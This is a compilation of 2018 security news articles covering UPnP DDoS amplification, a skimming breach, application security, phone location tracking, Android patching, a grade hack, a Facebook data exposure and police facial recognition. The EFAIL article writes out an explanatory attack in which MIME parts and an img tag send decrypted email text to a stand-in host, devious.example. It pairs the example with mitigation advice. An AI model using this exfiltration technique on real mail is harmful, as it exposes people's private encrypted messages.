STE WILLIAMS

New DDoS Attack Method Leverages UPnP

‘Lock down UPnP routers,’ researchers say.

A new DDoS technique is adding a new twist to this common threat and upping the chance that an attack will have an impact on business operations. The new attack leverages a known vulnerability in Universal Plug and Play (UPnP) to get around many of the current defense techniques and swamp a target’s network and servers.

The basis of the attack is a DNS amplification technique that bounces a DNS query response to the victim based on a spoofed requester address. In this new DDoS approach, though – detailed by researchers at Imperva – the attack mechanism is a UPnP router that is happy to forward requests from one external source to another (in violation of UPnP behavior rules). Using the UPnP router returns the data on an unexpected UDP port from a spoofed IP address, making it more difficult to take simple action to shut down the traffic flood.

In the original attack and the new proof of concept, a DNS amplification was used, but the researchers note that there’s no technical reason that a similar approach couldn’t be used in SSDP, DNS, and NTP attacks.

When both source address and port are obfuscated, many current DDoS remediation techniques become ineffective. While deep packet inspection will work against the attack, it’s a resource-intensive method that can be both costly and limited. The researchers say that the most effective way to stop this attack method is for organizations to lock down their UPnP routers, taking a weapon out of the hands of attackers.

Related Content:

 

Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and … View Full Bio

Article source: https://www.darkreading.com/new-ddos-attack-method-leverages-upnp/d/d-id/1331799?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Rail Europe Notifies Riders of Three-Month Data Breach

Rail Europe North America alerts customers to a security incident in which hackers planted card-skimming malware on its website.

Rail Europe North America (RENA), a website Americans use to buy European train tickets, today confirmed a three-month data breach in which customers’ payment card data was compromised. RENA reports the incident began on November 29, 2017 and continued through February 16, 2018, when a bank inquiry informed the organization of an attack.

Attackers lifted RENA’s data with credit card-skimming malware placed on its website, a particularly concerning aspect of the incident, says Comparitech privacy advocate Paul Bischoff. In most data breaches, cybercriminals gain unauthorized access to a corporate database.

“In this case, however, the hackers were able to affect the front end of the Rail Europe website with ‘skimming’ malware, meaning customers gave payment and other information directly to the hackers through the website,” he explains. “While the details haven’t been fully disclosed, the fact that this went on for three months shows a clear lack of security by Rail Europe.”

Skimmers are usually placed on top of hardware so it seems like they are part of the payment portal, he says. This means just about all payment info was current when it was submitted – and the attackers took more than credit card numbers, expirations dates, and verification codes. They also stole name and gender info, delivery and invoicing addresses, email addresses, phone numbers, and in some cases, usernames and passwords.

Read more details here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/endpoint/rail-europe-notifies-riders-of-three-month-data-breach/d/d-id/1331800?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Taming the Chaos of Application Security: ‘We Built an App for That’

Want to improve the state of secure software coding? Hide the complexity from developers.

We have decades of secure code development training behind us, the refinement of secure coding practices, and new application security testing and development tools coming to market annually. Yet one of the biggest and oldest barriers to developing secure software remains. What is it?

It’s the complexity of these tools, how they are managed, and how they integrate that creates unnecessary drudgery for development teams. There is so much that we force developers to slog through that it slows them down from being able to do their job, which is to develop great software that people want to use.

This is what usually happens: As developers busily do their thing and build new applications and features, someone from security comes in the room and explains that a software assessment tool will be inserted in their pipeline. The tool throws off all types of false positives and irrelevant results, which, from the perspective of developers, only gets in the way and slows them down. If this process was ever scalable, it’s certainly not scalable in modern continuous delivery environments.

To succeed, security teams must take radically different — and more effective — approaches to help developers build more secure applications. This was what we did at Capital One, with considerable success.

Streamlining Application Security Processes
We had more than 3,500 different application teams, within seven separate lines of business, developing roughly 3,500 applications within their own continuous delivery pipelines. Each of these teams had significant flexibility regarding the tools that they chose to use and what languages they used for development. While productive, it was a form of managed chaos, with seven fully independent lines of business each essentially doing their own thing.

Our application security team, on the other hand, essentially consisted of a small pool of consultants. We were spending an inordinate amount of time just trying to get the Web application security tools up and running with each of the 3,500 teams. In addition to getting the software security assessment tools in place, the consultants would reach out to each application team to provide consulting and training. With so many development teams and different tools and languages in place, it just wasn’t scalable.

Another significant challenge for the application security team was the lack of a stick they could use to enforce good security development hygiene. Our security consultants would reach out to each development team and attempt to engage them for training, consult on effective development security practices, and try to convince them about the need to change practices. There was no way to force the development teams to actually engage and make these efforts work.

Fortunately, every developer and team at Capital One truly wanted to develop secure code. Unfortunately, the processes we had in place were too slow to be reasonably effective and timely. It would take three months from the initial contact with a development team to actually install and train the team on how to use the security assessment software. Not good enough.

The Solution? We Had to Transform the System
So, we did what developers do: we built an app for that. Then we provided teams an option that removed the burden of having to run their own application assessment tools. It was software security assessment-as-a-service for these internal teams, and all developers needed do was sign up.

To secure their code, development teams would log into the system, send a single command through the API, and have themselves and their app registered for assessment. The system would then automatically pull the compiled code artifacts needed for the assessment, identify requirements and policy, and then orchestrate and manage the third-party scanning tools on the back end. The results from the assessment were then fed to the developer’s dashboard or pulled/pushed from an API. The good news for developers was that they didn’t have to do anything in this process aside from registering the app to get high-quality assessment results for minimum effort.

The application security team also used their expertise to filter assessment results so developers weren’t burdened with irrelevant outputs and false positives. What developers received in the results they knew to be legitimate security concerns that needed to be resolved.

Of course, we didn’t roll this out all at once. Initially, we worked with one of the two largest teams at Capital One. Our goal in that initial pilot was to learn how to make a service that developers would really want to use. We took a novel approach and actually asked the development teams what they would want — including everything from the user interface to presentation of the results to the level of automation. Not so surprisingly, developers appreciated the fact that the system could be fully automated.

What was amazing was that developers loved the system. In fact, they loved it so much that they started telling other development teams.

We began the pilot at the beginning of 2017, and the initial two teams that used the system began telling other teams. As a result, we witnessed registrations accelerate through word of mouth. By the middle of 2017, the system went from two applications registered to 780 applications registered. All the while we, kept improving the service and developers continued self-registration.

We added additional software security assessment tools. Each of these new tools did different types of assessments better than other tools, so they all complemented each other. What was most exciting was that we could provide enhanced application software security assessments and code review without developers having to change their day-to-day routines even as we added additional assessment and code composition tools.

Results: A Single Pipeline for Code Analysis Tools
The results speak for themselves: the application teams became our customers. And when all was said and done, by the end of 2017, we had 2,600 application development teams enrolled in the system. In contrast, in the year before the system was implemented, the company processed about 12,000 software security assessments. In the year we introduced this system, which we named “security code orchestration,” the company ramped up to run that same number of assessments per day and totaled near 400,000 software security assessments for the year.

For application security teams, this is a clear win. First, because all the software security assessment tool sets were abstracted away from the engineering teams, we could add or replace software security tools on the back end of the system with ease. This meant we could instantly improve the quality of assessments by improving the quality of our tools across the entire enterprise. The development teams wouldn’t even know a change was made. As we evolved the system, it became the single pipeline for code analysis tools, including non-security-related tasks such as code quality and license compliance. As such, we ended up with going from secure code orchestration to code quality orchestration.

Most importantly, the entire organization was able to move from an ad hoc and a low level of software assessment coverage to more than 80% coverage. And, as it turned out, the software security teams didn’t need any kind of a stick — developers wanted a secure code pipeline because it was so easy to use and provided them value.

Related Content:

Caleb Sima has been engaged in the Internet security arena since 1994 and has become widely recognized as a leading expert in web security, penetration testing and the identification of emerging security threats. His pioneering efforts and expertise have helped define the web … View Full Bio

Article source: https://www.darkreading.com/application-security/taming-the-chaos-of-application-security-we-built-an-app-for-that/a/d-id/1331785?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Prison phone service can expose the location of anyone with a phone

In late April, somebody sent a letter containing meth to an inmate at an Arizona jail.

Tracking down the correspondent was no problem. Police looked at phone calls between the meth sender’s address and the inmate and then made an arrest, according to what Matthew Thomas, chief deputy of the Pinal County Sheriff’s Office, told the New York Times.

It was push-button easy thanks to the police having access to a location data lookup service from a company called Securus Technologies that provides and monitors calls to inmates. According to the Times, marketing documents show that the service, which is typically used by marketers and other businesses, gets the location data from major cellphone carriers, including ATT, Sprint, T-Mobile and Verizon.

It’s far too easy to get that data, some say. Privacy experts, at least one legislator, and inmates’ families say the service, which is fed by data from a mobile marketing company called 3Cinteractive, enables users to look up the whereabouts of nearly any mobile phone in the country, within seconds, without verifying the warrants or affidavits that Securus requires users to upload.

The system is typically used by marketers who offer deals to people based on their location.

It brings back memories of a Google scheme, revealed last year, that aims to track users in real life. As Google announced at its annual Marketing Next conference in May 2017, it wants to go beyond just serving ads to consumers. Using an artificial intelligence (AI) tool called Attribution, it said it would follow us around to see where we go, tracking us across devices and channels – mobile, desktop and in physical stores – to see what we’re buying, to match purchases up with what ads we’ve seen, and to then automatically tell marketers what we’re up to and what ads have paid off.

The Electronic Privacy Information Center (EPIC) was none too happy about the idea. In short order, EPIC filed a complaint with the Federal Trade Commission (FTC) to stop Google from tracking in-store purchases.

Likewise, people whose locations have been allegedly tracked without legal authorization via Securus’s service aren’t happy about it either. In an ongoing federal prosecution, a Grand Jury has alleged that Cory Hutcheson, a former Missouri sheriff’s deputy, used Securus at least 11 times to look up people’s information without legal authority. He’s facing 11 counts of alleged forgery against targets that include a judge and members of the State Highway Patrol. Hutcheson was dismissed last year for a separate, unrelated matter, and he’s pleaded not guilty to surveillance and forgery charges.

Securus is one of the largest prison phone providers in the country. Its marketing material is, naturally, on the warm and fuzzy side: its phone service keeps inmates in touch with their families, it says, while location data helps to track down people afflicted with Alzheimer’s.

But as the ACLU notes, the company is also known for the steep costs of inmates’ calls, for limiting families to video-only visits, and for violating attorney-client privilege by recording phone calls between prisoners and their attorneys.

Last week, the company was in the limelight for what the ACLU calls “even more troubling practices.” Namely, as Senator Ron Wyden charged in letters made public on Friday, Securus is “[undermining] the privacy and civil liberties of millions upon millions of Americans.”

In those letters, Wyden demanded action from the Federal Communications Commission (FCC) and several major telecommunications companies, describing Securus’s ability to obtain and share the phone location data of virtually anyone who uses a phone.

Wyden says that Securus is buying real-time location from the wireless carriers and providing it to the government through a self-service web portal “for nothing more than the legal equivalent of a pinky promise.”

All correctional officers have to do is go to the portal, enter any phone number, and then upload a document that purports to be an “official document giving permission” to get at the data.

A spokesman for Securus told the Times that the company requires customers to upload a legal document, such as a warrant or affidavit, and certify that the activity was authorized:

Securus is neither a judge nor a district attorney, and the responsibility of ensuring the legal adequacy of supporting documentation lies with our law enforcement customers and their counsel.

The spokesman also said that Securus restricts its services only to law enforcement and corrections facilities, and that not all officials at a given location have access to the system.

Wyden said in his letters that Securus officials told him that the company does nothing to verify that uploaded documents provide judicial authorization for real-time location surveillance. Nor do they conduct any review of surveillance requests. He also said that Securus was wrong when it said that it’s up to correctional facilities to make sure employees don’t misuse the web portal.

As pointed out by Ars Technica, the Supreme Court is now set to rule on the case of Carpenter v. United States: a case that aims, after years of confusion, to iron out what kind of privacy – if any – Americans can expect with regards to their phones’ location data.

Law enforcement in that case relied on vast amounts of data collected from cellphone companies that showed the movements of Timothy Ivory Carpenter, who police said was the ringleader of a robbery spree.

As of May 2015, a US court had ruled that police could access phone location data without a warrant. But that decision didn’t resolve the issue, given that it ran counter to lower courts in several states having ruled that phone records are constitutionally protected, including Montana, Maine, Minnesota, Massachusetts, and New Jersey.

With all these contradictory laws, the question of what authorization, if any, law enforcement needs to get at our location data is legally complicated.

But why bother with the process at all? Securus’s service entirely cuts through the red tape, Wyden says:

It is incredibly troubling that Securus provides location data to the government at all – let alone that it does so without a verified court order or other legal process.

As you can see in a publicly available screenshot (PDF: page 30) of Securus’s online portal, the company simply requires an investigator to check a box to “certify the attached document is an official document giving permission to look up the location on this phone number requested.”

The investigator “then inputs the cellular number that is to be tracked and within seconds, the approximate location of the cell phone will be displayed on a graphical map of the area.”

In other words, just check a box.

So much easier than dealing with the Fourth Amendment.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/bJCpVtBe0qQ/

The EFAIL vulnerability – why it’s OK to keep on using email

This week’s bug of the month is the trendily-named EFAIL.

Like many groovy bugs these days, it’s both a BWAIN (bug with an impressive name) and a BWIVOL (bug with its very own logo, shown in the image at the top of this article).

The name is a pun of sorts on the word “email”, and the bug is caused by a flaw in the specifications set down for two popular standards used for email encryption, namely OpenPGP and S/MIME.

Simply put, the EFAIL vulnerabilities are a pair of security holes that a crook might be able to use to trick recipients of encrypted messages into leaking out some or all of their decrypted content.

Note that this attack only applies if you are using S/MIME or OpenPGP for end-to-end email encryption.

If you aren’t using either of these add-ons in your email client, this vulnerability doesn’t affect you – after all, if the crooks can sniff out your original messages and they’re not encrypted, they’ve got your plaintext already.

Note also that this attack doesn’t work on all messages; it doesn’t work in real time; you need a copy of the original encrypted message; it only works with some email clients; and it pretty much requires both HTML rendering and remote content download turned on in your email client.

Additionally, for one of the flavours of the attack, you have to know, or be able to guess correctly, some of the plaintext from the original message.

Technically speaking, these attacks aren’t strictly due to bugs, but rather to sloppy standards in S/MIME and OpenPGP that aren’t strict enough by design to inhibit this sort of “message tweaking”.

In the short term, you can expect updates to affected email clients that do their best to suppress these holes; in the long term, you should hope for improved standards for end-to-end email encryption.

In the immediate term, we’ve provided some steps below that you can take to protect yourself right now.

How EFAIL works

Here’s what you have to do, assuming that your victim is using a vulnerable email client:

  • Capture an encrypted message. You can do this as it’s being sent, during transit, or after delivery.
  • Modify the message subtly and then send it again. The alterations are chosen so that, after the message is unscrambled for display, it consists of the now-decrypted text wrapped inside a reference such as an image tag that links out to some external website.
  • Wait for the victim’s email client to fetch content from the maliciously-constructed web reference. Because the link is wrapped around decrypted text, the resulting URL used in the download request will leak plaintext.

One way to pull off this trick is summarised on the EFAIL web page: you replay the original encrypted MIME email message, but you insert unencrypted MIME body parts in HTML format above and below the encrypted chunk.

This means that the final decrypted message ends up sandwiched between two HTML fragments of your choice.

Imagine that your stolen-but-encrypted message body part looks like this:

--MIMESEPARATOR
Content-Type: [...encrypted...]
Content-Transfer-Encoding: base64

XXXXXXXXXXXX...[base64(encrypt(plaintext))]...XXXXXX

Assume that, after decryption, the message comes out as:

The secret plaintext revealed

Now, replay the encrypted message wrapped up as follows:

--MIMESEPARATOR
Content-Type: text/html

img src="http://devious.example/
--MIMESEPARATOR
Content-Type: [encrypted]
Content-Transfer-Encoding: base64

XXXXXXXXXXXX...[base64(encrypt(plaintext))]...XXXXXX
--MIMESEPARATOR
Content-Type: text/html

"

If the victim’s email client blindly stitches together the three extracted-decrypted-and-decoded-as-needed MIME body parts, the ready-for-display message ends up like this:

img src="http://devious.example/The secret plaintext revealed"

Now, if the email client decides to apply the Content-Type of text/html to the entire decrypted-and-stitched-together message, and if HTML message display is turned on, and if “fetch remote content” is enabled (either by default or because the recipient decides to click the [Fetch images] button or its equivalent in their mailer)…

…then their email client will issue an HTTP GET request to download the specified “image”, something like this:

GET /The%20secret%20plaintext%20revealed HTTP/1.1
Host: devious.example
User-Agent: [someidentifier]

See what you did there?

The victim just reached out via HTTP to your website, with a URL path consisting of the email message text after their email client had carefully and automatically unscrambled it.

You just pulled off a plaintext data leakage attack, essentially turning the encryption plugin against itself!

As the attacker, you could also serve back an innocent looking image (what’s known in the trade as a decoy), perhaps even tailored to your victim, in order to disguise the treachery you just pulled off.

Spaces aren’t allowed in URLs, so the original link in the IMG tag isn’t legal and can’t actually be used in an HTTP request. But web clients helpfully avoid this problem by automatically replacing spaces with the legal URL text %20, which is the hexadecimal equivalent of 32, the ASCII code for the space character. Of course, if there’s a quote mark somewhere in the decrypted text, the IMG link will be cut off early and might not work, and if the decrypted text is too long, the email client’s web downloader might truncate or refuse the resulting URL, but that would save you from a data breach by accident rather than by design.

There’s another way

There’s a second way to trigger an EFAIL attack detailed in the paper, one that doesn’t require you to put new MIME body parts either side of the encrypted email.

We’re not going to explain it fully here, because the details are quite tricky, but the outcome is similar to the situation described above: you inject HTML tags into the decrypted text so that the final message contains web links in which the URLs wrap around data that’s supposed to be private.

If the email client treats the ready-to-use message as HTML and tries to render it for display by fetching remote content, the same data leakage happens as before because you receive a web request from the victim in which the URL path is a chunk of secret data, handily decrypted for you.

This second attack only works if you can modify some blocks of the original encrypted data in such a way as to control what comes out when you decrypt it; this, is turn, is only possible for encrypted blocks where you already know the decrypted version – what’s called a known plaintext attack.

Unfortunately, encrypted S/MIME body parts tend to start with the text string Content-type: multipart/signed, meaning that there’s almost always known plaintext to work with.

Any known plaintext of 16 bytes or longer is enough to inject one or more 16-byte blocks of chosen output into the decrypted stream (assuming the 16-bytes-per-block AES cipher is used in CBC or CFB mode), although this sort of modification also introduces 16 bytes of garbage each time, something that you need to keep in mind when choosing how to tweak the original message.

Ultimately, this means that it is technically possible, albeit tricky, to corrupt the encrypted data in such a way that short text strings are injected into the decrypted data, along with various fragments of garbage.

If the messed-up decryption were viewed as raw text, little harm would be done because the corruption would almost certainly be obvious.

What turns the modification into a potential attack is the possibility that the corrupted output might include sneakily-injected web links deliberately chosen to leak data.

What to do?

  • Check the EFAIL paper for a list of potentially vulnerable email clients. If yours is at risk, keep your eyes open for a patch that stops these attacks.
  • Turn off HTML email rendering in your email client. Note that it’s not sufficient to stop your mailer from sending HTML; you need to stop it processing HTML when you receive it. If you’re the sort of email user who finds the end-to-end encryption of S/MIME vital, you probably want HTML rendering off anyway, as a way of minimising the risk of any sort of HTML-based data exfiltration.
  • Turn off “show remote content” in your email client. If you must have HTML rendering turned on, at least ensure that you aren’t authorising your mailer to make outbound connections automatically. Autorendering remote content exposes you to lots of online risks, even if you don’t use S/MIME or OpenPGP.
  • Don’t accept encrypted messages that fail their integrity checks, or aren’t integrity protected. The second flavour of the EFAIL attack relies on modifying both both the encrypted and decrypted text, and you shouldn’t trust an altered message anyway, whether the modifcations were there to introduce dodgy HTML tags or not.
  • If you are a programmer, only ever use authenticated encryption algorithms from now on. Modern modes of encryption, such as AES-GCM, automatically encrypt and produce a message authentication code at the same time. That means you can always tell if anyone has messed with encrypted data.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/6oAl3xnHaCo/

The next Android version’s killer feature? Security patches

Big news for Android users – the next version of Google’s mobile OS will require device makers to agree to implement regular security patches for the first time in the operating system’s history.

For now, the only evidence we have for this development is a brief and easy-to-miss comment made at last week’s I/O conference by Android’s director of security, David Kleidermacher.

Still, his words don’t leave much wiggle room:

We’ve also worked on building security patching into our OEM agreements. Now this will really lead to a massive increase in the number of devices and users receiving regular security patches.

About time security watchers will say as they survey the mess of Android’s fragmentation, which, paradoxically, has grown more pronounced as the OS has recently matured.

That maturity has come at a price – a new version every year – which sounds great until you contemplate the consequences of large numbers of devices with security vulnerabilities that won’t or can’t be patched.

Android fragmentation happens on two axes at the same time, namely the annual updates to the OS (which add new features and architecture tweaks), and monthly security updates.

Consider that in the nine years between Android Cupcake in April 2009 and the forthcoming Android P, Google will have produced 14 versions of its mobile OS.

Granted, only a few of these will be still be active in many countries but even chopping out older incarnations would leave us with:

  • Version 5 (Lollipop) – November 2014
  • Version 6 (Marshmallow) – October 2015
  • Version 7 (Nougat) – August 2016
  • Version 8 (Oreo) – August 2017
  • Version 9 (Android P) – August 2018

Not forgetting all the point versions for each that sit in between these annual revisions. Even those running the latest version on a new phone face a problem of getting regular (or any) security updates – currently, only Google-branded devices receive monthly security fixes, which the company documents on its developer’s site.

One important reason for delayed or non-existent updates is that each hardware vendor had to heavily customise Android to work with their devices.

Google’s answer from version 7 onwards was Project Treble, an updating architecture that separated the Android OS from hardware-specific code.

This has improved the frequency of patches for other vendors, but it’s still a long way from perfect with many Android devices months behind at best.

Kleidermacher’s comments indicate this is about to change. We still don’t know what “regular” will mean in practice but it’s hard to believe Google wouldn’t impose the same monthly cycle it works to for its own products.

This heralds a big culture change for Google’s relationship with device makers, which has traditionally been arm’s length by design.

The wrinkle for Google is that even smartphones that appear to have been patched, often haven’t, with researchers recently uncovering a wide variety of missing patches on devices that have officially been updated.

It’s a third and largely ignored level of fragmentation that underlines how difficult the issue has become for Google.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/VGsRN2HqADw/

Police dog sniffs out USB drive to snare school hacker

Thanks to a trained police dog sniffing out a thumb drive hidden inside a box of tissues, a high schooler in a San Francisco Bay area suburb has been accused of hacking grades: some students’ grades got bumped up, and some got elbowed down.

Local TV station KPIX reports that police in Concord – the eighth largest city in the area – say that the hack started with a phishing email.

The mail went out to teachers at Ygnacio Valley High School and linked to a website disguised to look like a Mount Diablo School District site. Concord Police Sergeant Carl Cruz told KPIX that the message prompted recipients to go to the bogus site and then…

…to log in to refresh your password or reset something.

…which one teacher did, thereby handing the hacker their login credentials,

Police aren’t releasing the name of the suspect, since he’s underage. They’re accusing him of using the teacher’s login to get into the electronic grading system and boost or lower 16 students’ grades. That includes his own grades, which he raised, police claim.

KPIX say that police traced an “electronic trail” – an IP address, one assumes – to the suspect’s house and searched it last Wednesday.

That’s where Doug the Dog and a USB drive tucked into a box of tissues comes in. The K-9 is one of the few police dogs trained to sniff out electronic devices, and “that’s what he did,” Sergeant Cruz said.

We’ve previously written about another electronics-sniffing dog named Thoreau who helped to catch an alleged paedophile by sniffing out hidden hard drives.

At the time, a good amount of readers were taken aback by that one, wondering if the search that led to the arrest of the alleged paedophile was warranted and whether it might lead to scenarios such as police dogs randomly sniffing out hard drives “hidden” in their luggage. Would that make the luggage owner a suspect, given that “it ‘could’ or ‘might’ contain child abuse materials?”

One reader pondered:

The existence of a thumbdrive or external USB hard drive hardly seems sufficient to warrant accusations of this sort.

That’s an unlikely event, fortunately. Such searches require warrants.

As the Electronic Frontier Foundation (EFF) explains in its guide to police searches of computers or electronic media, the police can’t simply enter your home to search it or any electronic device inside, like a laptop or mobile phone, without a warrant.

The Law Enforcement Cyber Center (LECC) explains that warrants to seize or search digital devices or media require probable cause that they contain, or are, contraband, evidence of a crime, fruits of crime, or a tool to commit a crime.

Search warrants also require particularity: they have to describe the particular place to be searched and the specific items that police will seize. In the case of thumb drives, that means the content of the drive must be specified in the warrant as opposed to just referring to the drive itself. The LECC refers to US guidelines on searching and seizing computers and obtaining evidence in criminal investigations, which stipulate that…

When electronic storage media are to be searched because they store information that is evidence of a crime, the items to be seized under the warrant should usually focus on the content of the relevant files rather than the physical storage media…

[One approach] is to begin with an ‘all records’ description; add limiting language stating the crime, the suspects, and relevant time period, if applicable; include explicit examples of the records to be seized; and then indicate that the records may be seized in any form, whether electronic or non-electronic.

In some jurisdictions, judges or magistrates may impose specific conditions on how the search is to be executed or require police to explain how they plan to limit the search before the warrant may be granted.

At any rate, the high schooler’s dad told police that his son wasn’t up to no good. He was just poking around in the school systems to see what he could do.

That, however, is no defense.

Curiosity in the young is generally considered a healthy trait but parents be warned: “poking around” is illegal without authorization. That, in fact, is encapsulated in a law known as the Computer Fraud and Abuse Act (CFAA).

Grade hacking and unauthorized computer access are illegal. They can lead to a visit from the FBI. They can lead to jail time.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/iZUH0B9J2Fs/

Facebook app left 3 million users’ data exposed for four years

After being burned to a crisp having been found to be manhandling Facebook users’ data, Cambridge Analytica’s ashes blew away on 2 May.

Before it did, former employees had told Gizmodo that they knew the writing was on the wall for the data analytics company, but they didn’t realize how fast the flames would engulf it.

It felt unjust, they seemed to believe. They were just a “typical member of their industry caught in a media firestorm,” as Gizmodo put it. You can see why they’d feel unfairly singled out: in short order, it became clear that Cambridge Analytica wasn’t an aberration. A twin named Cubeyou turned up in April: yet another firm that dressed up its personal-data snarfing as “nonprofit academic research,” in the form of personality quizzes, and handed over the data to marketers.

And now, we have a triplet.

A New Scientist investigation has found that yet another popular Facebook personality app used as a research tool by academics and companies – this one is called myPersonality – fumbled the data of three million Facebook users, including their answers to intimate questionnaires.

Academics at the University of Cambridge distributed data from myPersonality to hundreds of researchers via a website with lousy security… and left it there for anybody to get at, for four years.

New Scientist described the data as being “highly sensitive, revealing personal details of Facebook users, such as the results of psychological tests.” It was meant to be stored and shared anonymously, but “such poor precautions were taken that deanonymising would not be hard,” it reports.

People had to register as a project collaborator to get access to the full data set, and more than 280 people from nearly 150 institutions did so, including university researchers and those from companies including Facebook, Google, Microsoft and Yahoo.

No permanent academic contract? No big-name company paying you to do research? No problem. For four years, there’s been a username and password to get at the data. The credentials have been sitting on the code-sharing website GitHub. A simple web search would lead you to the working credentials.

Besides being an academic project, myPersonality, like its personality quiz siblings, let commercial companies – or, at least, their researchers – get their hands on the data.

For its part, Cambridge Analytica accessed data from an app called This Is Your Digital Life, developed by Cambridge University professor Aleksandr Kogan, who’s at the center of the Cambridge Analytica allegations. (Kogan was previously on the myPersonality project, as well). As long as the researchers agreed to abide by strict data protection procedures and didn’t directly earn money from the data set, such companies were allowed access, according to New Scientist.

More than six million Facebook users completed the tests on myPersonality, and nearly half agreed to share data from their Facebook profiles with the project, according to the news outlet:

All of this data was then scooped up and the names removed before it was put on a website to share with other researchers. The terms allow the myPersonality team to use and distribute the data ‘in an anonymous manner such that the information cannot be traced back to the individual user’.

This, however, was not how the data was handled. Pam Dixon, with the World Privacy Forum, told New Scientist that besides posting a publicly available password to get at the data set, and besides allowing access to hundreds of researchers, the anonymization wasn’t up to snuff. Each Facebook user was given a unique ID that pulled together data including their age, gender, location, status updates, results on the personality quiz and more.

With all that, deanonymizing the data would be a snap, Dixon said. As we’ve written about, the more data you string together, the less time it takes to correlate it all to the point of being able to strip away anonymity.

Dixon, with regards to the data collected by the myPersonality app:

You could re-identify someone online from a status update, gender and date.

Facebook suspended myPersonality on 7 April. The app is currently under investigation for potentially having violated the platform’s policies due to the language used in the app and on its website to describe its data-sharing practices.

MyPersonality is only one of many: Facebook on Monday announced that it had suspended 200 apps so far in the app investigation and audit that CEO Mark Zuckerberg promised following the Cambridge Analytica scandal.

The Information Commissioner’s Office (ICO) is investigating myPersonality. In fact, the University of Cambridge told New Scientist that it was alerted to the issues surrounding myPersonality by the ICO. The university says the app was created before the data set’s controllers – David Stillwell and Michal Kosinski, at the University’s Psychometrics Centre – joined the university.

New Scientist quoted the university’s statement:

[The app] did not go through our ethical approval processes… The University of Cambridge does not own or control the app or data.

Readers, are any of you still using these type of Facebook personality quizzes? I’m expecting a “Hell, NO” strong enough to shake the halls over at Facebook headquarters, but please, do tell in the comments section below. If you’re staying the course, you might want to take a peek at our tips on How to protect your Facebook data.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/cVzqwCsNSFo/

Zero arrests, 2 correct matches, no criminals: London cops’ facial recog tech slammed

London cops’ facial recognition kit has only correctly identified two people to date – neither of whom were criminals – and the force has made no arrests using it, figures published today revealed.

According to information released under Freedom of Information laws, the Metropolitan Police’s automated facial recognition (AFR) technology has a 98 per cent false positive rate.

That figure is the highest of those given by UK police forces surveyed by the campaign group Big Brother Watch as part of a report that urges the the police to stop using the tech immediately.

Forces use facial recognition in two ways: one is after the fact, while cross-checking of images against mugshots held in national databases; the other involves real-time scanning of people’s faces in a crowd to compare against a “watch list” that is freshly drawn up for each event.

Big Brother Watch’s report focused on the latter, which it said breaches human rights laws as it surveils people without their knowledge and might dissuade them from attending public events.

police at notting hill

London cops urged to scrap use of ‘biased’ facial recognition at Notting Hill Carnival

READ MORE

And, despite cops’ insistence that it works, the report showed an average false positive rate – where the system “identifies” someone not on the list – of 91 per cent across the country.

The Met has the highest, at 98 per cent, with 35 false positives recorded in one day alone, at the Notting Hill Carnival 2017.

However, the Met Police claimed that this figure is misleading because there is human intervention after the system flags up the match.

“We do not not consider these as false positive matches because additional checks and balances are in place to confirm identification following system alerts,” a spokesperson told The Register.

The system, though, hasn’t had much success in positive identifications either: the report showed there have been just two accurate matches, and neither person was a criminal.

The first was at Notting Hill, but the person identified was no longer wanted for arrest because the information used to generate the watch list was out of date.

The second such identification took place during last year’s Remembrance Sunday event, but this was someone known as a “fixated individual” – these are people known to frequently contact public figures – but who was not a criminal and not wanted for arrest.

Typically people on this list have mental health issues, and Big Brother Watch expressed concern that the police said there had not been prior consultation with mental health professionals about cross-matching against people in this database.

The group described this as a “chilling example of function creep” and an example of the dangerous effect it could have on the rights of marginalised people.

It also raised concerns about racial bias in the kit used, criticising the Met Police for saying it would not record ethnicity figures for the number of individuals identified, either correctly or not.

As a result, it said, “any demographic disproportionately in this hi-tech policing will remain unaccountable and hidden from public view”.

This is compounded by the fact that the commercial software used by the Met – and also South Wales Police (SWP) – has yet to be tested for demographic accuracy biases.

“We have been extremely disappointed to encounter resistance from the police in England and Wales to the idea that such testing is important or necessary,” Big Brother Watch said in the report.

SWP – which has used AFR at 18 public places since it was first introduced in May 2017 – has fared only slightly better.

Its false positive rate is 91 per cent, and the matches led to 15 arrests – equivalent to 0.005 per cent of matches.

The SWP said that false positives were to be expected while the technology develops, but that the accuracy was improving, and added that no one had been arrested after a false match – again because of human intervention.

“Officers can quickly establish if the person has been correctly or incorrectly matched by traditional policing methods, either by looking at the person or through a brief conversation,” a spokesperson said.

“If an incorrect match has been made, officers will explain to the individual what has happened and invite them to see the equipment along with providing them with a Fair Processing Notice.”

Underlying the concerns about the poor accuracy of the kit are complaints about a lack of clear oversight – an issue that has been raised by a number of activists, politicians and independent commissioners in related areas.

Government minister Susan Williams – who once described the use of AFR as an “operational” decision for the police – said earlier this year the government is to create a board comprised of the information, biometrics and surveillance camera commissioners to oversee the tech.

Further details are expected in the long-awaited biometrics strategy, which is slated to appear in June.

Big Brother Watch also reiterated its concerns about the mass storage of custody images of innocent people on the Police National Database, which has more than 12.5 million photos on it that can be scanned biometrically.

Despite a 2012 High Court ruling that said keeping images of presumed innocent people on file was unlawful, the government has said it isn’t possible to automate removal. This means that they remain on the system unless a person asks for them to be removed.

In March, Williams said that because images can only be deleted manually, weeding out innocent people “will have significant costs and be difficult to justify given the off-setting reductions forces would be required to find to fund it”.

The group had little patience with this, stating in the report the government should provide funding for administrative staff to deal with this problem – one person per force employed for a full year at £35,000 would be a total of £1.5m, it said.

“‘Costs’ are not an acceptable reason for the British Government not to comply with the law,” it said. Big Brother Watch said that given the Home Office had forked out £2.6m to SWP for its AFR kit, they were also “hardly a convincing reason”.

Big Brother Watch is launching its campaign against AFR today in Parliament. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/05/15/met_police_slammed_inaccurate_facial_recognition/

